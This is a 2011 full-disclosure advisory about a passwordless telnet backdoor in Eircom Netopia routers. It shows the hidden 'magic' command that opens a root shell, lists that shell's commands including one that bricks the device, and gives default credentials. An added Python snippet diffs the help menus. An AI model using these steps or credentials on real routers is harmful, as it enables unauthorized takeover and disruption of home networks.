Eircom Netopia Router Backdoor
Source: vfocus.net  Author: vfocus  Published: 2011-03-28
++++++++++++++++++++

FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!
Yes, failcom suck, and they did it again. DERP!

They gave us a nice TELNET shell into their routers, and now we can
mess about 'cos it spawns a root shell by magic! (and magic is the
actual command!)

They also left a lovely web interface with supposed remote access
capability, but I have to test that fully.

Thanks to this, evil people could be hiding "in your switches
rerouting your riches!"

Disclosed by: Netcat, Hex, Chess.

++++++++++++++++++++

Netopia SOC OS version 7.8.0 has a simple TELNET backdoor.

If a malicious attacker is on the local area network of a Netopia
router, and they TELNET to 192.168.1.254 they are greeted with the
following prompt... There is no password needed!

++++++++++++++++++++

Terminal shell v1.0
Copyright ©2008 Motorola, Inc.  All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.8.0 (build r2)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)

Netopia-2000/146306722576>


++++++++++++++++++++

If it does ask for a passphrase, we found admin/admin and
admin/password worked every time in the wild.

At the 'Admin shell' a help command gives you the following menu...


++++++++++++++++++++

Netopia-2000/146306722576> help
arp                           to send ARP request
atmping                       to send ATM OAM loopback
clear                         to erase all stored configuration information
clear_certificate             to clear stored SSL certificate
clear_log                     to clear stored log data
configure                     to configure unit's options
diagnose                      to run self-test
download                      to download config file
exit                          to quit this shell
help                          to get more: "help all" or "help help"
hotspot                       to set or show hotspot authentication info
install                       to download and program an image into flash
license                       to enter an upgrade key to add a feature
log                           to add a message to the diagnostic log
loglevel                      to report or change diagnostic log level
netstat                       to show IP information
nslookup                      to send DNS query for host
ping                          to send ICMP Echo request
quit                          to quit this shell
reset                         to reset subsystems
restart                       to restart unit
show                          to show system information
start                         to start subsystem
status                        to show basic status of unit
telnet                        to telnet to a remote host
traceroute                    to send traceroute probes
upload                        to upload config file
view                          to view configuration summary
wan_type                      to Set WAN interface type
who                           to show who is using the shell
?                             to get help: "help all" or "help help"
wps                           to issue Wireless Protected Setup commands

Netopia-2000/146306722576>

++++++++++++++++++++

However, typing the command 'magic' (not listed) brings up a new
shell...

++++++++++++++++++++

Netopia-2000/146306722576> magic
 (poof!)

Netopia-2000/146306722576# help
arp                           to send ARP request
atmping                       to send ATM OAM loopback
brcm                          to read/write broadcom switch
clear                         to erase all stored configuration information
clear_certificate             to clear stored SSL certificate
clear_log                     to clear stored log data
configure                     to configure unit's options
diagnose                      to run self-test
download                      to download config file
exit                          to quit this shell
help                          to get more: "help all" or "help help"
hotspot                       to set or show hotspot authentication info
install                       to download and program an image into flash
loopback                      to set the interface in loopback mode
license                       to enter an upgrade key to add a feature
log                           to add a message to the diagnostic log
loglevel                      to report or change diagnostic log level
netstat                       to show IP information
nslookup                      to send DNS query for host
ping                          to send ICMP Echo request
quit                          to quit this shell
reset                         to reset subsystems
restart                       to restart unit
rma_count                     to perform RMA functions
show                          to show system information
sslclient                     to send HTTPS request to the Server. Default Port is 433
start                         to start subsystem
status                        to show basic status of unit
telnet                        to telnet to a remote host
traceroute                    to send traceroute probes
upload                        to upload config file
view                          to view configuration summary
wan_type                      to Set WAN interface type
ata                           to issue commands related to remote ATA configuration
who                           to show who is using the shell
access_code                   to show if access code is valid
bootflags                     to show or set the bootflags
checksum                      to calculate and display the cksums
console                       to make this session the console
mem                           to display or edit system memory
trace                         to toggle routing tracing
crash                         to cause system death
adsldebug                     to debug commands
dsm                           to DSM commands
set_language                  to set web display language
peer-address                  to print IP address of this shell user
?                             to get help: "help all" or "help help"
wps                           to issue Wireless Protected Setup commands

Netopia-2000/146306722576#

+++++++++++++++++++++++
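
For anyone reviewing what the unlisted shell exposes, the two `help` listings can be diffed mechanically instead of by eye. This is an added example, not part of the original advisory: the listings are abridged from the transcript above, and the names `parse_help` and `hidden_commands` are assumptions made for illustration.

```python
import re

# Abridged from the two `help` listings in the transcript; one description
# is wrapped across two lines, as happens in width-limited captures.
USER_HELP = """\
arp                           to send ARP request
clear                         to erase all stored configuration
information
who                           to show who is using the shell
"""

ROOT_HELP = """\
arp                           to send ARP request
brcm                          to read/write broadcom switch
clear                         to erase all stored configuration
information
who                           to show who is using the shell
bootflags                     to show or set the bootflags
mem                           to display or edit system memory
crash                         to cause system death
"""

# A command row is: name, a run of 2+ spaces, then a description.
ROW = re.compile(r"^(\S+)\s{2,}(\S.*)$")


def parse_help(text):
    """Return {command: description}, folding wrapped description lines."""
    commands, last = {}, None
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            last = m.group(1)
            commands[last] = m.group(2).strip()
        elif line.strip() and last and not line.rstrip().endswith((">", "#")):
            commands[last] += " " + line.strip()  # continuation of previous row
    return commands


def hidden_commands(user_help, root_help):
    """Commands listed only in the elevated shell, in menu order."""
    user = parse_help(user_help)
    return [(c, d) for c, d in parse_help(root_help).items() if c not in user]


if __name__ == "__main__":
    for name, desc in hidden_commands(USER_HELP, ROOT_HELP):
        print(f"{name:<12} {desc}")
```

Shell prompt lines are skipped by the parser, so a full captured session can be passed in unchanged.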

The 'Crash' command literally bricks the router. This shell is the
root shell.
It gets even worse though... It has a lovely web
interface if you open that web address in a browser!

+++++++++++++++++++++++

A malicious attacker on the LAN can do all kinds of things...

+++++++++++++++++++++++

ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE
VULNERABLE.
THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION
ALGORITHM'.

Not to mention, Eircom's default login is always:
eircom@eircom.net
broadband1

+++++++++++++++++++++++

Thanks for reading!

soon to come... can we overflow bit torrent buffers?

 